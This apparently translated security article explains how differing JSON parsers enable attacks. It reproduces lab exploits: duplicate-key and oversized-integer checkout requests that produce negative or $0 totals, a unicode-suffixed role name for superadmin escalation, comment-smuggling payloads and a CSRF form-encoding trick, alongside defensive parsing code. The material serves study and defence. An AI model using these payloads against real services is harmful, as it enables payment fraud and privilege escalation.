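JSON Parsing Discrepancies: A Security Risk Study
Introduction
This article shares a technique: the security risks that can arise from differences in JSON parsing.
Prerequisite: multiple components that parse JSON differently.
Starting with JSON
JSON (JavaScript Object Notation) is a lightweight data-interchange format that is easy for humans to read and write and easy for machines to parse and generate. It is widely used for data transfer, especially between clients and servers.
It originated in JavaScript, but over time it has become a general-purpose data format supported by many programming languages.
An example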
{
"name": "John Doe",
"age": 30,
"isEmployee": true,
"address": {
"street": "123 Main St",
"city": "New York",
"zipcode": "10001"
},
"phoneNumbers": ["123-456-7890", "987-654-3210"]
}
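JSON parsing security issues
Before getting started, here are two conclusions up front:
- The same JSON document can be parsed into different values across microservices, leading to a variety of potential security risks
- Because of the first point, the more JSON parsers a system contains, the more potential security issues it has
Root cause
As with most problems, nothing holds together without rules: because no specification strictly defines every detail of the JSON format, parsers diverge, and those divergences lead to security issues.
The official JSON RFC also gives only loose guidance on some details, such as how to handle duplicate keys and how to represent numbers. Although that guidance is followed by disclaimers about interoperability, most users of JSON parsers are unaware of these caveats.
Beyond the official RFC, different parsers also follow a number of other specifications, listed below: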
- IETF JSON RFC (8259 and prior): official Internet Engineering Task Force (IETF) specification.
- ECMAScript Standard: Changes to JSON are released in lockstep with RFC releases, and the standard refers to the RFC for guidance on JSON. However, non-spec conveniences provided by the JavaScript interpreter, such as quoteless strings and comments, have inspired many parsers.
- JSON5: This superset specification augments the official specification by explicitly adding convenience features (e.g., comments, alternative quotes, quoteless strings, trailing commas).
- HJSON: HJSON is similar to JSON5 in spirit with different design choices.
- And others
Duplicate key handling (precedence)
obj = {"a": 1, "a": 2}
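In the example above, is the value of a 1 or 2?
See what IETF JSON RFC 8259 says: https://datatracker.ietf.org/doc/html/rfc8259
The RFC does address this: names within an object SHOULD be unique, and behavior for non-unique names is described as unpredictable. In short, there is no mandatory rule.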
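As a minimal sketch of what this looseness means in practice, the snippet below feeds the document above to Python's standard json module. The variable names are illustrative. The only behavior relied on is that json.loads keeps the last value for a repeated name and that object_pairs_hook receives every name/value pair in document order.

```python
import json

doc = '{"a": 1, "a": 2}'

# Default behavior: the dict is built pair by pair, so the later value
# overwrites the earlier one.
parsed = json.loads(doc)

# object_pairs_hook sees every pair before it is collapsed into a dict,
# which makes the duplicate visible.
pairs = json.loads(doc, object_pairs_hook=list)

print(parsed)  # {'a': 2}
print(pairs)   # [('a', 1), ('a', 2)]
```

Other parsers are free to return 1, raise an error, or keep both pairs, which is exactly the gap the rest of this article explores.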
Reproduction: https://github.com/BishopFox/json-interop-vuln-labs/tree/master/lab1
We use this lab to analyze the problem.
- Start the containers
docker-compose up -d
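- Python (Flask + jsonschema) handling
import jsonschema
import requests
import json
# Note: test_json is a Python dict literal, not parsed JSON text. A repeated key
# in a literal keeps the last value, the same outcome json.loads() produces.
test_json = {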
"orderId": 10,
"cart": [
{
"id": 0,
"qty": 5
},
{
"id": 1,
"qty": -1,
"qty": 1
}
]
}
test_json2 = {
"orderId": 10,
"cart": [
{
"id": 0,
"qty": 5
},
{
"id": -10,
"qty": 1
}
]
}
schema = {
"type": "object",
"properties": {
"orderId": {
"type": "number",
"maximum": 10,
},
"cart": {
"type": "array",
"items": {
"type": "object",
"properties": {
"id": {
"type": "number",
"minimum": 0,
"exclusiveMaximum": 9 #len(productDB)-1
},
"qty": {
"type": "integer",
"minimum": 1
},
},
"required": ["id", "qty"],
}
}
},
"required": ["orderId", "cart"],
}
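# validate() returns None on success and raises jsonschema.ValidationError on failure
res = jsonschema.validate(instance=test_json, schema=schema)
print(res)
print(test_json)
# test_json2 has id = -10, which violates the schema's "minimum": 0, so this call raises
res2 = jsonschema.validate(instance=test_json2, schema=schema)
print(res2)
print(test_json2)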
- As shown, Python keeps the last occurrence of a duplicate key
- Go handling
package main
import (
"fmt"
"github.com/buger/jsonparser"
)
func main() {
jsonData := []byte(`{
"orderId": 10,
"cart": [
{
"id": 0,
"qty": 5
},
{
"id": 1,
"qty": -1,
"qty": 1
}
]
}`)
// fmt.Println("data:", jsonData)
jsonparser.ArrayEach(
jsonData,
func(value []byte, dataType jsonparser.ValueType, offset int, err error) {
id, _ := jsonparser.GetInt(value, "id")
qty, _ := jsonparser.GetInt(value, "qty")
fmt.Println("id:", id)
fmt.Println("qty:", qty)
},
"cart")
}
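As shown, Go's jsonparser keeps the first occurrence of a duplicate key.
The lab1 write-up exploits exactly this: the Python Flask service acts as a validating proxy layer, while the real calculation logic runs in Go.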
curl 192.168.56.130:5000/cart/checkout -H "Content-Type: application/json" -d @lab1_req.json
# lab1_req.json
{
"orderId": 10,
"cart": [
{
"id": 0,
"qty": 5
},
{
"id": 1,
"qty": -1,
"qty": 1
}
]
}
- Result: the Go service reads qty = -1 for the second item, so the total is 100*5 - 200 = 300
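The mismatch can be modeled in a few lines of Python. This is only a sketch: first_wins is a hypothetical stand-in for a first-key-wins backend (it is not the lab's Go code), and the PRICES table is an assumption inferred from the arithmetic 100*5 - 200 above.

```python
import json

REQUEST = (
    '{"orderId": 10, "cart": ['
    '{"id": 0, "qty": 5}, '
    '{"id": 1, "qty": -1, "qty": 1}]}'
)

# Assumed unit prices, inferred from the 100*5 - 200 arithmetic in the text.
PRICES = {0: 100, 1: 200}


def first_wins(pairs):
    """Build a dict that keeps the FIRST value of a repeated key."""
    result = {}
    for key, value in pairs:
        result.setdefault(key, value)
    return result


# What the validating layer sees: json.loads keeps the last duplicate.
validator_view = json.loads(REQUEST)
# What a first-key-wins backend would see (hypothetical model).
backend_view = json.loads(REQUEST, object_pairs_hook=first_wins)

validated_qty = validator_view["cart"][1]["qty"]
processed_qty = backend_view["cart"][1]["qty"]
total = sum(PRICES[item["id"]] * item["qty"] for item in backend_view["cart"])

print(validated_qty, processed_qty, total)  # 1 -1 300
```

The validator approves qty = 1 while the backend charges for qty = -1, so the schema check passes on a value that is never actually used.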
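Character truncation & comments (precedence)
Character truncation and comments can be used to provoke parsing conflicts, which increases the number of parsers affected by duplicate-key precedence.
Character truncation
When certain characters appear in a string, some JSON parsing libraries truncate the string while others do not. As a result, different keys may be interpreted as duplicates.
For example, consider the following payloads: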
{"test": 1, "test\[raw \x0d byte]": 2}
{"test": 1, "test\ud800": 2}
{"test": 1, "test"": 2}
{"test": 1, "te\st": 2}
- Python 2.x Unicode encoding/decoding behavior
import json
import ujson
# Serialization into illegal unicode.
u"asdf\ud800".encode("utf-8")
# Reserializing illegal unicode
json.dumps({"test": "asdf\xed\xa0\x80"})
# Third-party library ujson handling a duplicate key
ujson.loads('{"test": 1, "test\\ud800": 2}')
- Python 3.x Unicode encoding/decoding behavior
In summary, Python 2 leaves room for a bypass in cases like these.
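For comparison, here is a small sketch of how Python 3's standard json module treats the lone-surrogate payload. The "lossy" step at the end is a hypothetical downstream component that drops bytes it cannot encode. It is included only to show how two distinct keys can collapse into one.

```python
import json

doc = '{"test": 1, "test\\ud800": 2}'

# Python 3's json module keeps the unpaired surrogate, so the keys stay distinct.
parsed = json.loads(doc)
keys = list(parsed)

# Strict UTF-8 encoding refuses the unpaired surrogate...
try:
    keys[1].encode("utf-8")
    strict_ok = True
except UnicodeEncodeError:
    strict_ok = False

# ...but a lossy step (hypothetical) silently drops it, turning the second
# key into a duplicate of the first.
lossy_key = keys[1].encode("utf-8", errors="ignore").decode("utf-8")

print(len(parsed), strict_ok, lossy_key == "test")  # 2 False True
```

So the parser itself does not truncate here, but any later component that encodes leniently can reintroduce the duplicate-key ambiguity.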
lab2 reproduction
https://github.com/BishopFox/json-interop-vuln-labs/tree/master/lab2
- Create an admin user via /user/create (normal business logic)
{
"user": "adminUser",
"roles": ["superadmin"]
}
- Creating an ordinary role succeeds
{"name": "simple"}
superadmin\ud888
Unicode parsing bypass
[root@localhost lab2]# cat role2.json
{"name": "superadmin\ud888"}
- Create exampleUser with the role superadmin\ud888
[root@localhost lab2]# curl localhost:5002/user/create -H "Content-Type: application/json" -d @user2.json
{"OK":"Created user 'exampleUser'"}
[root@localhost lab2]# cat user2.json
{
"user": "exampleUser",
"roles": ["superadmin\ud888"]
}
- Verify
Comment truncation
The following examples are compiled from the reference:
obj = {"description": "Duplicate with comments", "test": 2, "extra": /*, "test": 1, "extra2": */}
Different JSON libraries parse it as follows:
- GoLang's GoJay library
description = "Duplicate with comments"
test = 2
extra = ""
- Java's JSON-iterator library
description = "Duplicate with comments"
extra = "/*"
extra2 = "*/"
test = 1
obj = {"description": "Comment support", "test": 1, "extra": "a"/*, "test": 2, "extra2": "b"*/}
Different JSON libraries parse it as follows:
- Java’s GSON library
{"description":"Comment support","test":1,"extra":"a"}
- Ruby’s simdjson library
{"description":"Comment support","test":2,"extra":"a","extra2":"b"}
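A strict parser rejects both payloads outright, which is the third possible outcome alongside the two shown for each case. The sketch below checks this with Python's standard json module. strictly_parses is an illustrative helper name.

```python
import json

payloads = [
    '{"description": "Duplicate with comments", "test": 2, "extra": /*, "test": 1, "extra2": */}',
    '{"description": "Comment support", "test": 1, "extra": "a"/*, "test": 2, "extra2": "b"*/}',
]


def strictly_parses(text):
    """Return True if Python's json module accepts the text, False otherwise."""
    try:
        json.loads(text)
        return True
    except json.JSONDecodeError:
        return False


results = [strictly_parses(p) for p in payloads]
print(results)  # [False, False]
```

If one service in a chain rejects such input while another accepts it, the accepting one decides what the payload means, so it is worth knowing which of your parsers tolerate comments.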
JSON serialization risks
Serialization also needs to account for duplicate keys. For example:
# Java's JSON-iterator
# input
obj = {"test": 1, "test": 2}
# output
obj["test"] // 1
obj.toString() // {"test": 2}
# C++’s rapidjson
# input
obj = {"test": 1, "test": 2}
# output
obj["test"] // 2
obj.toString() // {"test": 1, "test": 2}
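The same round-trip check is easy to run against any library. As a sketch, this is what Python's standard json module does with that input. The variable names are illustrative.

```python
import json

received = '{"test": 1, "test": 2}'

# Value the application reads after parsing.
value_read = json.loads(received)["test"]

# Document the application would forward after re-serializing.
forwarded = json.dumps(json.loads(received))

print(value_read)             # 2
print(forwarded)              # {"test": 2}
print(forwarded == received)  # False
```

Here the read value and the re-serialized document agree with each other, but the forwarded bytes no longer match what was received. Whether a service forwards the original bytes or its own re-serialization therefore changes what downstream parsers see.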
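Integer and float parsing
First, the official position: the RFC explicitly notes that number handling may be inconsistent across implementations.
Large numbers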
# input
999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
# possible outputs
999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
9.999999999999999e95
1E+96
0
9223372036854775807
For example:
- python3 demo
[root@localhost json-interop-vuln-labs_test]# python3 python_json.py
/usr/local/lib/python3.8/site-packages/urllib3/__init__.py:35: NotOpenSSLWarning: urllib3 v2 only supports OpenSSL 1.1.1+, currently the 'ssl' module is compiled with 'LibreSSL 3.9.0'. See: https://github.com/urllib3/urllib3/issues/3020
warnings.warn(
None
{'orderId': 10, 'cart': [{'id': 0, 'qty': 5}, {'id': 1, 'qty': 999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999}]}
Python 3 handles the large number correctly
- Go demo
jsonData := []byte(`{
"orderId": 10,
"cart": [
{
"id": 0,
"qty": 5
},
{
"id": 1,
"qty": 999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
}
]
}`)
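In the Go demo (same parsing code as above), the large number comes out as 0: GetInt cannot represent the value, and because the code discards the returned error, qty is left at 0
- A second solution to lab1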
[root@localhost lab1]# cat lab1_alt_req.json
{
"orderId": 10,
"cart": [
{
"id": 8,
"qty": 999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
}
]
}
curl 192.168.56.130:5000/cart/checkout -H "Content-Type: application/json" -d @lab1_alt_req.json
>>>
[root@localhost lab1]# curl 192.168.56.130:5000/cart/checkout -H "Content-Type: application/json" -d @lab1_alt_req.json
Receipt:
999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999x $100 E-Gift Card @ $100/unit
Total Charged: $0
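The "possible outputs" listed earlier can be reproduced in Python by swapping the integer conversion that json.loads uses. This is a sketch only: clamp_int64 and zero_on_overflow are hypothetical models of other parsers' behavior, not real library functions, and they ignore negative overflow for brevity.

```python
import json

INT64_MAX = 2**63 - 1
big = "9" * 96
doc = '{"qty": ' + big + "}"

# Python int has arbitrary precision, so the value survives exactly.
exact = json.loads(doc)["qty"]

# Models a parser that stores every number as a double.
as_float = json.loads(doc, parse_int=float)["qty"]


def clamp_int64(text):
    """Model a parser that saturates at the int64 maximum (hypothetical)."""
    return min(int(text), INT64_MAX)


def zero_on_overflow(text):
    """Model a caller that ignores an overflow error and keeps 0 (hypothetical)."""
    value = int(text)
    return value if value <= INT64_MAX else 0


clamped = json.loads(doc, parse_int=clamp_int64)["qty"]
zeroed = json.loads(doc, parse_int=zero_on_overflow)["qty"]

print(exact == int(big), as_float == 1e96, clamped, zeroed)
# True True 9223372036854775807 0
```

The lab's second solution is the first and last rows combined: the validator sees an exact positive integer, and the backend computes with 0.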
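- One last special case: large numbers that overflow to infinity
On the RFC: Positive and negative infinity along with NaN (not a number) are not supported by the official RFC
Again, the RFC imposes no mandatory behavior here, so the possible cases are as follows: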
{"description":"Big float","test":1.0e4096}
{"description":"Big float","test":Infinity}
{"description":"Big float","test":"+Infinity"}
{"description":"Big float","test":null}
{"description":"Big float","test":Inf}
{"description":"Big float","test":3.0e14159265358979323846}
{"description":"Big float","test":9.218868437227405E+18}
# PHP demo
<?php
echo 0 == 1.0e4096 ? "True": "False" . "\n"; # False
echo 0 == "Infinity" ? "True": "False" . "\n"; # True on PHP 7 and earlier; PHP 8 compares a number with a non-numeric string as strings, giving False
?>
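Python's standard json module is itself permissive here, which makes it a convenient way to see several of the cases above. The following is a sketch with illustrative variable names. The library behavior it relies on (accepting Infinity by default and the allow_nan flag on json.dumps) is documented in the json module.

```python
import json
import math

# A float literal beyond double range overflows to infinity when parsed.
overflowed = json.loads('{"test": 1.0e4096}')["test"]

# The bare constant Infinity is accepted by default, although the RFC
# grammar does not allow it.
constant = json.loads('{"test": Infinity}')["test"]

# Serializing infinity emits a non-RFC token by default...
emitted = json.dumps({"test": float("inf")})

# ...unless allow_nan=False, in which case json.dumps raises ValueError.
try:
    json.dumps({"test": float("inf")}, allow_nan=False)
    strict_dump_ok = True
except ValueError:
    strict_dump_ok = False

print(math.isinf(overflowed), math.isinf(constant), emitted, strict_dump_ok)
# True True {"test": Infinity} False
```

A service that re-serializes with the defaults can therefore turn a syntactically valid 1.0e4096 into the token Infinity, which a stricter parser downstream may reject or interpret differently.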
Permissive JSON parsing
In short, some JSON parsers strictly enforce the RFC grammar, while others tolerate "odd" characters.
- In CSRF attacks
POST /update_XXX HTTP/1.1
...
Content-Type: application/x-www-form-urlencoded
{"testlaitie233": 1}=
This leniency is also why some payloads work at all.
This area is a good candidate for fuzz testing.
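As a sketch of the strict side of this comparison, the helper below rejects the form-encoded request shown above on two independent grounds: the media type and the trailing "=". accept_json_body is a hypothetical function name, not part of any framework, and for simplicity it also treats a literal null body as rejected.

```python
import json


def accept_json_body(content_type, body):
    """Return the parsed body, or None if the request should be rejected."""
    # Accept only the JSON media type; parameters such as charset are allowed.
    media_type = content_type.split(";", 1)[0].strip().lower()
    if media_type != "application/json":
        return None
    try:
        # json.loads raises on trailing data such as the "=" a form post appends.
        return json.loads(body)
    except json.JSONDecodeError:
        return None


form_post = accept_json_body("application/x-www-form-urlencoded", '{"testlaitie233": 1}=')
trailing = accept_json_body("application/json", '{"testlaitie233": 1}=')
clean = accept_json_body("application/json; charset=utf-8", '{"testlaitie233": 1}')

print(form_post, trailing, clean)  # None None {'testlaitie233': 1}
```

A fuzzing run can use the same idea in reverse: feed mutated bodies to every parser in the chain and flag any input that one accepts and another rejects.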
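Defense
This splits into two perspectives: JSON library developers and ordinary developers who use those libraries.
- JSON library developers: follow the RFC strictly and handle the edge cases described in this article
- Ordinary developers (library users): take inventory of every parser in the architecture and enforce strict JSON Schema validation against abnormal input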
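On the user side, a validating layer can also refuse ambiguous documents before any schema check runs. The following is a minimal sketch using only hooks that Python's json.loads provides. strict_loads, is_accepted, and the int64 bound are assumptions chosen for illustration, and the right limits depend on what the downstream parsers can represent.

```python
import json
import math

INT64_MIN, INT64_MAX = -(2**63), 2**63 - 1


def _no_duplicates(pairs):
    """Reject objects that repeat a key instead of silently picking one."""
    result = {}
    for key, value in pairs:
        if key in result:
            raise ValueError(f"duplicate key: {key!r}")
        result[key] = value
    return result


def _bounded_int(text):
    """Reject integers that a 64-bit backend could not represent."""
    value = int(text)
    if not INT64_MIN <= value <= INT64_MAX:
        raise ValueError("integer outside int64 range")
    return value


def _finite_float(text):
    """Reject float literals that overflow to infinity."""
    value = float(text)
    if math.isinf(value):
        raise ValueError("float overflows to infinity")
    return value


def _no_constants(name):
    """Reject Infinity, -Infinity and NaN, which the RFC grammar excludes."""
    raise ValueError(f"non-RFC constant: {name}")


def strict_loads(text):
    return json.loads(
        text,
        object_pairs_hook=_no_duplicates,
        parse_int=_bounded_int,
        parse_float=_finite_float,
        parse_constant=_no_constants,
    )


def is_accepted(text):
    try:
        strict_loads(text)
        return True
    except ValueError:  # json.JSONDecodeError is a subclass of ValueError
        return False


print(is_accepted('{"id": 1, "qty": 1}'))             # True
print(is_accepted('{"id": 1, "qty": -1, "qty": 1}'))  # False
print(is_accepted('{"qty": ' + "9" * 96 + "}"))       # False
print(is_accepted('{"test": Infinity}'))              # False
```

Rejecting outright is a design choice: it avoids guessing which interpretation a downstream parser will pick, at the cost of refusing some documents that a single lenient parser would have handled.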
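Final thoughts
This article covered a class of potential security issues caused by JSON parsing. In real environments, it pays to analyze carefully where the JSON parsers in use differ and where they agree.
Historically, many CVEs have been rooted in this same mechanism.
References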
https://bishopfox.com/blog/json-interoperability-vulnerabilities